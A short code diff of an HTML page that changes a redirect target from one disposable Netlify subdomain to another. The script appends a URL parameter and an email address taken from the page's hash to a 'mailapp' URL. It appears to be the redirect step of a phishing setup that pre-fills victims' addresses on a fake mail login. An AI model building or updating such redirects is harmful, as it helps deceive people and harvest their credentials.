--- a/mailappflow.html
+++ b/mailappflow.html
@@ -6,7 +6,7 @@
   </title>
   <script>
     var data = getParameter();
-    var redir_to_page = "https://691e06bfdcbb772f06a82753--gregarious-bunny-1c2b51.netlify.app/mailapp" + data + ""; 
+    var redir_to_page = "https://inquisitive-puppy-13efac.netlify.app/mailapp.html" + data + ""; 
     var hash = window.location.hash;
     var email = hash.split('#')[1];
     redir_to_page = redir_to_page + email;
